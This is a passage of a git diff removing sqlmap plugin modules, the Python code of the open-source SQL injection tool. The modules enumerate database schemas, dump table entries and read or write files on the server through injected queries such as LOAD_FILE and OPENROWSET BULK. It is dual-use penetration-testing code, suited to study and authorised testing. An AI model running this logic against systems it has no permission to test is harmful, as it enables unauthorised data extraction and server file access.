- column = unArrayizeValue(inject.getValue(query, union=False, error=False)) - - if not isNoneValue(column): - if conf.getComments: - _ = queries[Backend.getIdentifiedDbms()].column_comment - if hasattr(_, "query"): - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper())) - else: - query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column)) - comment = unArrayizeValue(inject.getValue(query, union=False, error=False)) - else: - warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() - warnMsg += "possible to get column comments" - singleTimeWarnMessage(warnMsg) - - if not onlyColNames: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db)) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper())) - elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, - conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) - elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.query2 % (tbl, column) - - colType = unArrayizeValue(inject.getValue(query, union=False, error=False)) - - if Backend.isDbms(DBMS.FIREBIRD): - colType = FIREBIRD_TYPES.get(colType, colType) - - column = safeSQLIdentificatorNaming(column) - columns[column] = colType - else: - column = safeSQLIdentificatorNaming(column) - columns[column] = None - - if columns: - if conf.db in kb.data.cachedColumns: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns - else: - table[safeSQLIdentificatorNaming(tbl, True)] = columns - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table - - if not kb.data.cachedColumns: - warnMsg = "unable to retrieve column names for " - warnMsg += ("table '%s' " % unsafeSQLIdentificatorNaming(unArrayizeValue(tblList))) if len(tblList) == 1 else "any table " - warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.warn(warnMsg) - - if bruteForce is None: - return self.getColumns(onlyColNames=onlyColNames, colTuple=colTuple, bruteForce=True) - - return kb.data.cachedColumns - - def getSchema(self): - infoMsg = "enumerating database management system schema" - logger.info(infoMsg) - - try: - pushValue(conf.db) - pushValue(conf.tbl) - pushValue(conf.col) - - kb.data.cachedTables = {} - kb.data.cachedColumns = {} - - self.getTables() - - infoMsg = "fetched tables: " - infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \ - Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \ - else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \ - kb.data.cachedTables.items()]) - logger.info(infoMsg) - - for db, tables in kb.data.cachedTables.items(): - for tbl in tables: - conf.db = db - conf.tbl = tbl - - self.getColumns() - finally: - conf.col = popValue() - conf.tbl = popValue() - conf.db = popValue() - - return kb.data.cachedColumns - - def _tableGetCount(self, db, table): - if not db or not table: - return None - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - db = db.upper() - table = table.upper() - - if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - query = "SELECT %s FROM %s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(table, True)) - else: - query = "SELECT %s FROM %s.%s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(table, True)) - - count = inject.getValue(query, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if isNumPosStrValue(count): - if safeSQLIdentificatorNaming(db) not in kb.data.cachedCounts: - kb.data.cachedCounts[safeSQLIdentificatorNaming(db)] = {} - - if int(count) in kb.data.cachedCounts[safeSQLIdentificatorNaming(db)]: - kb.data.cachedCounts[safeSQLIdentificatorNaming(db)][int(count)].append(safeSQLIdentificatorNaming(table, True)) - else: - kb.data.cachedCounts[safeSQLIdentificatorNaming(db)][int(count)] = [safeSQLIdentificatorNaming(table, True)] - - def getCount(self): - if not conf.tbl: - warnMsg = "missing table parameter, sqlmap will retrieve " - warnMsg += "the number of entries for all database " - warnMsg += "management system databases' tables" - logger.warn(warnMsg) - - elif "." in conf.tbl: - if not conf.db: - conf.db, conf.tbl = conf.tbl.split('.', 1) - - if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - warnMsg = "missing database parameter. sqlmap is going to " - warnMsg += "use the current database to retrieve the " - warnMsg += "number of entries for table '%s'" % unsafeSQLIdentificatorNaming(conf.tbl) - logger.warn(warnMsg) - - conf.db = self.getCurrentDb() - - self.forceDbmsEnum() - - if conf.tbl: - for table in conf.tbl.split(","): - self._tableGetCount(conf.db, table) - else: - self.getTables() - - for db, tables in kb.data.cachedTables.items(): - for table in tables: - self._tableGetCount(db, table) - - return kb.data.cachedCounts diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py deleted file mode 100644 index 86e088ef..00000000 --- a/plugins/generic/entries.py +++ /dev/null @@ -1,522 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.agent import agent -from lib.core.bigarray import BigArray -from lib.core.common import Backend -from lib.core.common import clearConsoleLine -from lib.core.common import getLimitRange -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import isInferenceAvailable -from lib.core.common import isListLike -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import popValue -from lib.core.common import prioritySortColumns -from lib.core.common import pushValue -from lib.core.common import readInput -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.common import unArrayizeValue -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.dicts import DUMP_REPLACEMENTS -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import DBMS -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD -from lib.core.settings import CURRENT_DB -from lib.core.settings import NULL -from lib.request import inject -from lib.utils.hash import attackDumpedTable -from lib.utils.pivotdumptable import pivotDumpTable -from lib.utils.pivotdumptable import whereQuery - -class Entries: - """ - This class defines entries' enumeration functionalities for plugins. - """ - - def __init__(self): - pass - - def dumpTable(self, foundData=None): - self.forceDbmsEnum() - - if conf.db is None or conf.db == CURRENT_DB: - if conf.db is None: - warnMsg = "missing database parameter. sqlmap is going " - warnMsg += "to use the current database to enumerate " - warnMsg += "table(s) entries" - logger.warn(warnMsg) - - conf.db = self.getCurrentDb() - - elif conf.db is not None: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): - conf.db = conf.db.upper() - - if ',' in conf.db: - errMsg = "only one database name is allowed when enumerating " - errMsg += "the tables' columns" - raise SqlmapMissingMandatoryOptionException(errMsg) - - conf.db = safeSQLIdentificatorNaming(conf.db) - - if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): - conf.tbl = conf.tbl.upper() - - tblList = conf.tbl.split(",") - else: - self.getTables() - - if len(kb.data.cachedTables) > 0: - tblList = kb.data.cachedTables.values() - - if isinstance(tblList[0], (set, tuple, list)): - tblList = tblList[0] - elif not conf.search: - errMsg = "unable to retrieve the tables " - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - raise SqlmapNoneDataException(errMsg) - else: - return - - for tbl in tblList: - tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) - - for tbl in tblList: - conf.tbl = tbl - kb.data.dumpedTable = {} - - if foundData is None: - kb.data.cachedColumns = {} - self.getColumns(onlyColNames=True, dumpMode=True) - else: - kb.data.cachedColumns = foundData - - try: - kb.dumpTable = "%s.%s" % (conf.db, tbl) - - if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ - or safeSQLIdentificatorNaming(tbl, True) not in \ - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] \ - or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: - warnMsg = "unable to enumerate the columns for table " - warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming(tbl) - warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) - warnMsg += ", skipping" if len(tblList) > 1 else "" - logger.warn(warnMsg) - - continue - - columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] - colList = sorted(filter(None, columns.keys())) - - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - - if not colList: - warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) - warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - warnMsg += " (no usable column names)" - logger.warn(warnMsg) - continue - - colNames = colString = ", ".join(column for column in colList) - rootQuery = queries[Backend.getIdentifiedDbms()].dump_table - - infoMsg = "fetching entries" - if conf.col: - infoMsg += " of column(s) '%s'" % colNames - infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming(tbl) - infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - for column in colList: - _ = agent.preprocessField(tbl, column) - if _ != column: - colString = re.sub(r"\b%s\b" % re.escape(column), _, colString) - - entriesCount = 0 - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - entries = [] - query = None - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB): - query = rootQuery.inband.query % (colString, tbl) - elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): - # Partial inband and error - if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL): - table = "%s.%s" % (conf.db, tbl) - - retVal = pivotDumpTable(table, colList, blind=False) - - if retVal: - entries, _ = retVal - entries = zip(*[entries[colName] for colName in colList]) - else: - query = rootQuery.inband.query % (colString, conf.db, tbl) - elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): - query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0]) - else: - query = rootQuery.inband.query % (colString, conf.db, tbl) - - query = whereQuery(query) - - if not entries and query: - entries = inject.getValue(query, blind=False, time=False, dump=True) - - if not isNoneValue(entries): - if isinstance(entries, basestring): - entries = [entries] - elif not isListLike(entries): - entries = [] - - entriesCount = len(entries) - - for index, column in enumerate(colList): - if column not in kb.data.dumpedTable: - kb.data.dumpedTable[column] = {"length": len(column), "values": BigArray()} - - for entry in entries: - if entry is None or len(entry) == 0: - continue - - if isinstance(entry, basestring): - colEntry = entry - else: - colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u'' - - _ = len(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))) - maxLen = max(len(column), _) - - if maxLen > kb.data.dumpedTable[column]["length"]: - kb.data.dumpedTable[column]["length"] = maxLen - - kb.data.dumpedTable[column]["values"].append(colEntry) - - if not kb.data.dumpedTable and isInferenceAvailable() and not conf.direct: - infoMsg = "fetching number of " - if conf.col: - infoMsg += "column(s) '%s' " % colNames - infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - query = rootQuery.blind.count % tbl - elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): - query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) - elif Backend.isDbms(DBMS.MAXDB): - query = rootQuery.blind.count % tbl - else: - query = rootQuery.blind.count % (conf.db, tbl) - - query = whereQuery(query) - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - lengths = {} - entries = {} - - if count == 0: - warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl) - warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming(conf.db) - warnMsg += "appears to be empty" - logger.warn(warnMsg) - - for column in colList: - lengths[column] = len(column) - entries[column] = [] - - elif not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of " - if conf.col: - warnMsg += "column(s) '%s' " % colNames - warnMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.warn(warnMsg) - - continue - - elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL): - if Backend.isDbms(DBMS.ACCESS): - table = tbl - elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): - table = "%s.%s" % (conf.db, tbl) - elif Backend.isDbms(DBMS.MAXDB): - table = "%s.%s" % (conf.db, tbl) - - retVal = pivotDumpTable(table, colList, count, blind=True) - - if retVal: - entries, lengths = retVal - - else: - emptyColumns = [] - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) - - if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: - for column in colList: - if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0': - emptyColumns.append(column) - debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable) - debugMsg += "dumped as it appears to be empty" - logger.debug(debugMsg) - - try: - for index in indexRange: - for column in colList: - value = "" - - if column not in lengths: - lengths[column] = 0 - - if column not in entries: - entries[column] = BigArray() - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): - query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.query % (agent.preprocessField(tbl, column), - tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), - index) - elif Backend.isDbms(DBMS.SQLITE): - query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index) - - elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl) - - query = whereQuery(query) - - value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True) - value = '' if value is None else value - - _ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)) - lengths[column] = max(lengths[column], len(_)) - entries[column].append(value) - - except KeyboardInterrupt: - clearConsoleLine() - warnMsg = "Ctrl+C detected in dumping phase" - logger.warn(warnMsg) - - for column, columnEntries in entries.items(): - length = max(lengths[column], len(column)) - - kb.data.dumpedTable[column] = {"length": length, "values": columnEntries} - - entriesCount = len(columnEntries) - - if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag): - warnMsg = "unable to retrieve the entries " - if conf.col: - warnMsg += "of columns '%s' " % colNames - warnMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - warnMsg += "in database '%s'%s" % (unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "") - logger.warn(warnMsg) - else: - kb.data.dumpedTable["__infos__"] = {"count": entriesCount, - "table": safeSQLIdentificatorNaming(tbl, True), - "db": safeSQLIdentificatorNaming(conf.db)} - try: - attackDumpedTable() - except (IOError, OSError), ex: - errMsg = "an error occurred while attacking " - errMsg += "table dump ('%s')" % getSafeExString(ex) - logger.critical(errMsg) - conf.dumper.dbTableValues(kb.data.dumpedTable) - - except SqlmapConnectionException, ex: - errMsg = "connection exception detected in dumping phase " - errMsg += "('%s')" % getSafeExString(ex) - logger.critical(errMsg) - - finally: - kb.dumpTable = None - - def dumpAll(self): - if conf.db is not None and conf.tbl is None: - self.dumpTable() - return - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL < 5.0" - raise SqlmapUnsupportedFeatureException(errMsg) - - infoMsg = "sqlmap will dump entries of all tables from all databases now" - logger.info(infoMsg) - - conf.tbl = None - conf.col = None - - self.getTables() - - if kb.data.cachedTables: - if isinstance(kb.data.cachedTables, list): - kb.data.cachedTables = { None: kb.data.cachedTables } - - for db, tables in kb.data.cachedTables.items(): - conf.db = db - - for table in tables: - try: - conf.tbl = table - kb.data.cachedColumns = {} - kb.data.dumpedTable = {} - - self.dumpTable() - except SqlmapNoneDataException: - infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table) - logger.info(infoMsg) - - def dumpFoundColumn(self, dbs, foundCols, colConsider): - message = "do you want to dump entries? [Y/n] " - output = readInput(message, default="Y") - - if output and output[0] not in ("y", "Y"): - return - - dumpFromDbs = [] - message = "which database(s)?\n[a]ll (default)\n" - - for db, tblData in dbs.items(): - if tblData: - message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) - - message += "[q]uit" - test = readInput(message, default="a") - - if not test or test in ("a", "A"): - dumpFromDbs = dbs.keys() - elif test in ("q", "Q"): - return - else: - dumpFromDbs = test.replace(" ", "").split(",") - - for db, tblData in dbs.items(): - if db not in dumpFromDbs or not tblData: - continue - - conf.db = db - dumpFromTbls = [] - message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db) - message += "[a]ll (default)\n" - - for tbl in tblData: - message += "[%s]\n" % tbl - - message += "[s]kip\n" - message += "[q]uit" - test = readInput(message, default="a") - - if not test or test in ("a", "A"): - dumpFromTbls = tblData - elif test in ("s", "S"): - continue - elif test in ("q", "Q"): - return - else: - dumpFromTbls = test.replace(" ", "").split(",") - - for table, columns in tblData.items(): - if table not in dumpFromTbls: - continue - - conf.tbl = table - colList = filter(None, sorted(columns)) - - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - - conf.col = ",".join(colList) - kb.data.cachedColumns = {} - kb.data.dumpedTable = {} - - data = self.dumpTable(dbs) - - if data: - conf.dumper.dbTableValues(data) - - def dumpFoundTables(self, tables): - message = "do you want to dump tables' entries? [Y/n] " - output = readInput(message, default="Y") - - if output and output[0].lower() != "y": - return - - dumpFromDbs = [] - message = "which database(s)?\n[a]ll (default)\n" - - for db, tablesList in tables.items(): - if tablesList: - message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) - - message += "[q]uit" - test = readInput(message, default="a") - - if not test or test.lower() == "a": - dumpFromDbs = tables.keys() - elif test.lower() == "q": - return - else: - dumpFromDbs = test.replace(" ", "").split(",") - - for db, tablesList in tables.items(): - if db not in dumpFromDbs or not tablesList: - continue - - conf.db = db - dumpFromTbls = [] - message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db) - message += "[a]ll (default)\n" - - for tbl in tablesList: - message += "[%s]\n" % unsafeSQLIdentificatorNaming(tbl) - - message += "[s]kip\n" - message += "[q]uit" - test = readInput(message, default="a") - - if not test or test.lower() == "a": - dumpFromTbls = tablesList - elif test.lower() == "s": - continue - elif test.lower() == "q": - return - else: - dumpFromTbls = test.replace(" ", "").split(",") - - for table in dumpFromTbls: - conf.tbl = table - kb.data.cachedColumns = {} - kb.data.dumpedTable = {} - - data = self.dumpTable() - - if data: - conf.dumper.dbTableValues(data) diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py deleted file mode 100644 index 651285b9..00000000 --- a/plugins/generic/enumeration.py +++ /dev/null @@ -1,85 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import unArrayizeValue -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import DBMS -from lib.core.session import setOs -from lib.parse.banner import bannerParser -from lib.request import inject -from plugins.generic.custom import Custom -from plugins.generic.databases import Databases -from plugins.generic.entries import Entries -from plugins.generic.search import Search -from plugins.generic.users import Users - -class Enumeration(Custom, Databases, Entries, Search, Users): - """ - This class defines generic enumeration functionalities for plugins. - """ - - def __init__(self): - kb.data.has_information_schema = False - kb.data.banner = None - kb.data.hostname = "" - kb.data.processChar = None - kb.data.characterSet = None - - Custom.__init__(self) - Databases.__init__(self) - Entries.__init__(self) - Search.__init__(self) - Users.__init__(self) - - def getBanner(self): - if not conf.getBanner: - return - - if kb.data.banner is None: - infoMsg = "fetching banner" - logger.info(infoMsg) - - if Backend.isDbms(DBMS.DB2): - rootQuery = queries[DBMS.DB2].banner - for query in (rootQuery.query, rootQuery.query2): - kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=False)) - if kb.data.banner: - break - else: - query = queries[Backend.getIdentifiedDbms()].banner.query - kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=False)) - - bannerParser(kb.data.banner) - - if conf.os and conf.os == "windows": - kb.bannerFp["type"] = set(["Windows"]) - - elif conf.os and conf.os == "linux": - kb.bannerFp["type"] = set(["Linux"]) - - elif conf.os: - kb.bannerFp["type"] = set(["%s%s" % (conf.os[0].upper(), conf.os[1:])]) - - if conf.os: - setOs() - - return kb.data.banner - - def getHostname(self): - infoMsg = "fetching server hostname" - logger.info(infoMsg) - - query = queries[Backend.getIdentifiedDbms()].hostname.query - - if not kb.data.hostname: - kb.data.hostname = unArrayizeValue(inject.getValue(query, safeCharEncode=False)) - - return kb.data.hostname diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py deleted file mode 100644 index d90a8fdf..00000000 --- a/plugins/generic/filesystem.py +++ /dev/null @@ -1,304 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import sys - -from lib.core.agent import agent -from lib.core.common import dataToOutFile -from lib.core.common import Backend -from lib.core.common import checkFile -from lib.core.common import decloakToTemp -from lib.core.common import decodeHexValue -from lib.core.common import getUnicode -from lib.core.common import isNumPosStrValue -from lib.core.common import isListLike -from lib.core.common import isStackingAvailable -from lib.core.common import isTechniqueAvailable -from lib.core.common import readInput -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapUndefinedMethod -from lib.request import inject - -class Filesystem: - """ - This class defines generic OS file system functionalities for plugins. - """ - - def __init__(self): - self.fileTblName = "sqlmapfile" - self.tblField = "data" - - def _checkFileLength(self, localFile, remoteFile, fileRead=False): - if Backend.isDbms(DBMS.MYSQL): - lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile - - elif Backend.isDbms(DBMS.PGSQL) and not fileRead: - lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid - - elif Backend.isDbms(DBMS.MSSQL): - self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)") - inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)); - - lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) - - try: - localFileSize = os.path.getsize(localFile) - except OSError: - warnMsg = "file '%s' is missing" % localFile - logger.warn(warnMsg) - localFileSize = 0 - - if fileRead and Backend.isDbms(DBMS.PGSQL): - logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile) - sameFile = True - else: - logger.debug("checking the length of the remote file '%s'" % remoteFile) - remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - sameFile = None - - if isNumPosStrValue(remoteFileSize): - remoteFileSize = long(remoteFileSize) - localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding()) - sameFile = False - - if localFileSize == remoteFileSize: - sameFile = True - infoMsg = "the local file '%s' and the remote file " % localFile - infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize) - elif remoteFileSize > localFileSize: - infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize) - infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize) - else: - infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize) - infoMsg += "file '%s' (%d B)" % (localFile, localFileSize) - - logger.info(infoMsg) - else: - sameFile = False - warnMsg = "it looks like the file has not been written (usually " - warnMsg += "occurs if the DBMS process' user has no write " - warnMsg += "privileges in the destination path)" - logger.warn(warnMsg) - - return sameFile - - def fileToSqlQueries(self, fcEncodedList): - """ - Called by MySQL and PostgreSQL plugins to write a file on the - back-end DBMS underlying file system - """ - - counter = 0 - sqlQueries = [] - - for fcEncodedLine in fcEncodedList: - if counter == 0: - sqlQueries.append("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, fcEncodedLine)) - else: - updatedField = agent.simpleConcatenate(self.tblField, fcEncodedLine) - sqlQueries.append("UPDATE %s SET %s=%s" % (self.fileTblName, self.tblField, updatedField)) - - counter += 1 - - return sqlQueries - - def fileEncode(self, fileName, encoding, single, chunkSize=256): - """ - Called by MySQL and PostgreSQL plugins to write a file on the - back-end DBMS underlying file system - """ - - with open(fileName, "rb") as f: - content = f.read() - - return self.fileContentEncode(content, encoding, single, chunkSize) - - def fileContentEncode(self, content, encoding, single, chunkSize=256): - retVal = [] - - if encoding: - content = content.encode(encoding).replace("\n", "") - - if not single: - if len(content) > chunkSize: - for i in xrange(0, len(content), chunkSize): - _ = content[i:i + chunkSize] - - if encoding == "hex": - _ = "0x%s" % _ - elif encoding == "base64": - _ = "'%s'" % _ - - retVal.append(_) - - if not retVal: - if encoding == "hex": - content = "0x%s" % content - elif encoding == "base64": - content = "'%s'" % content - - retVal = [content] - - return retVal - - def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False): - output = None - - if forceCheck is not True: - message = "do you want confirmation that the local file '%s' " % localFile - message += "has been successfully written on the back-end DBMS " - message += "file system ('%s')? [Y/n] " % remoteFile - output = readInput(message, default="Y") - - if forceCheck or (output and output.lower() == "y"): - return self._checkFileLength(localFile, remoteFile) - - return True - - def askCheckReadFile(self, localFile, remoteFile): - message = "do you want confirmation that the remote file '%s' " % remoteFile - message += "has been successfully downloaded from the back-end " - message += "DBMS file system? [Y/n] " - output = readInput(message, default="Y") - - if not output or output in ("y", "Y"): - return self._checkFileLength(localFile, remoteFile, True) - - return None - - def nonStackedReadFile(self, remoteFile): - errMsg = "'nonStackedReadFile' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def stackedReadFile(self, remoteFile): - errMsg = "'stackedReadFile' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): - errMsg = "'unionWriteFile' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): - errMsg = "'stackedWriteFile' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def readFile(self, remoteFiles): - localFilePaths = [] - - self.checkDbmsOs() - - for remoteFile in remoteFiles.split(","): - fileContent = None - kb.fileReadMode = True - - if conf.direct or isStackingAvailable(): - if isStackingAvailable(): - debugMsg = "going to read the file with stacked query SQL " - debugMsg += "injection technique" - logger.debug(debugMsg) - - fileContent = self.stackedReadFile(remoteFile) - elif Backend.isDbms(DBMS.MYSQL): - debugMsg = "going to read the file with a non-stacked query " - debugMsg += "SQL injection technique" - logger.debug(debugMsg) - - fileContent = self.nonStackedReadFile(remoteFile) - else: - errMsg = "none of the SQL injection techniques detected can " - errMsg += "be used to read files from the underlying file " - errMsg += "system of the back-end %s server" % Backend.getDbms() - logger.error(errMsg) - - fileContent = None - - kb.fileReadMode 